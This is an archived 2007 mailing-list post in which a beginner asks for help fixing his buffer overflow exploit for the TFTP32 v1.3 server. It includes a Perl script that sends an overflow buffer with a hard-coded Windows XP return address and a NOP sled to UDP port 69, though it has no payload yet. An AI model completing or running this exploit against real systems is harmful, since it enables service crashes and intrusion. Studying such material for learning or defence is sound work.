Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Help needed in TFTP32v1.3 BO

Help needed in TFTP32v1.3 BO

From: wong yu liang <yuliang11_at_yahoo.com>
Date: Tue, 16 Oct 2007 22:53:53 -0700 (PDT)

hi all,
  i'm new to bufferoverflow. i've gone thru some basic
examples in bufferover now i'm trying to write my own
exploit based on this software. basically i found this
perl script somewhere on the net. it takes 264 bytes
to overflow with 4 byte extra for the EIP.
  i''m using call esp , #0x77e2d9d3 advapi32.dll
winxp sp2 for the RET and i found that i'm still 4
bytes off when i dump the esp register in ollydbg.
i've some examples on the net like "add esp 10, ret 4"
, but i'm not sure what it means.
help someone can enlighten me on this. thanks

use IO::Socket;
$host = "10.10.10.2";#Target IP here
$port = "69";#Target Port Here. TFTP uses udp 69

#0x77e2d9d3 advapi32.dll
$shellcode="\xd3\xd9\xe2\x77";

$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
 136

$buf ="\x00\x02";
$buf .= "\x41" x 264;

$buf .= $shellcode;

#Print size of buffer
print "Length: ", length($buf), "\n";

#Try to create socket
$socket = IO::Socket::INET->new(Proto => "udp") or die
"Cannot Create Socket:
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

#Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf) or
die "Cannot Send Buffer:
$!\n";
print "All Done\n";

       
____________________________________________________________________________________
Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out.
http://answers.yahoo.com/dir/?link=list&sid=396545433
Received on Oct 17 2007

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos